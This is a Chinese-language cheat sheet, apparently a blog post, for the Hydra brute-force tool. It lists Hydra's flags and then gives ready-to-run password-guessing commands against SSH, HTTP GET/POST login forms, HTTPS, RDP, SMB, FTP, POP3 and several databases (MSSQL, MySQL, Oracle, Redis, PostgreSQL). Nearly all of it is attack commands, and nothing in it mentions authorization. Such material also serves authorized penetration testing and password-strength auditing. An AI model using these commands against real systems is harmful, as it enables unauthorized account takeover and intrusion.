Hydra

Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。

参数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
-l   指定用户名
-p 指定密码
-L 指定用户名字典
-P 指定密码字典
-C 指定所用格式为“user:password”的字典文件
-e
n null,表示尝试空密码
s same,把用户名本身当做密码进行尝试
r 反向,把用户名倒叙,当做密码进行尝试。
-vV 显示执行细节
-o 保存执行结果
-s 指定非默认端口
-M 指定破解的目标文件,如果不是默认端口,后面跟上“:port”
-t 指定爆破时的任务数量(默认16)线程数
-f 破解出密码就停止爆破

-----------------------------------
爆破ssh协议
hydra -l root -p 12345678 192.168.31.173 ssh -vV

使用字典爆破
hydra -l root -P 密码字典 192.168.31.173 ssh

SSH协议的默认用户是 root,所以上面我们都是指定的用户名,如果不确定用户名,就要指定用户名字典,比如下面这种格式:
hydra -L usr.txt -P pwd.txt 192.168.31.173 ssh

get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username\=USER&password\=PASS&submit\=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id\=USER&passwd\=PASS:\<title\>wrong username or password\</title\>"

破解https:
hydra -m /index.php -l muts -P pass.txt IP https
hydra -m /index.php -l username -P pass.txt IP https
----------------------------------
Hydra爆破常见服务
远程桌面(RDP)
hydra -l administrator -P 密码字典 192.168.31.173 rdp

共享文件(SMB)
hydra -l administrator -P 密码字典 192.168.31.173 smb

文件传输(FTP)
hydra -l 用户名 -P 密码字典 192.168.31.173 ftp

邮箱协议(POP3)
hydra -l 用户名 -P 密码字典 192.168.31.173 pop3

MSSQL数据库
hydra -l sa -P 密码字典 192.168.31.173 mssql

MySQL数据库
hydra -l 用户名 -P 密码字典 192.168.31.173 mysql

Oracle数据库
hydra -l 用户名 -P 密码字典 192.168.31.173 oracle

Redis数据库
hydra -l 用户名 -P 密码字典 192.168.31.173 redis

PgSQL数据库
hydra -l 用户名 -P 密码字典 192.168.31.173 postgresql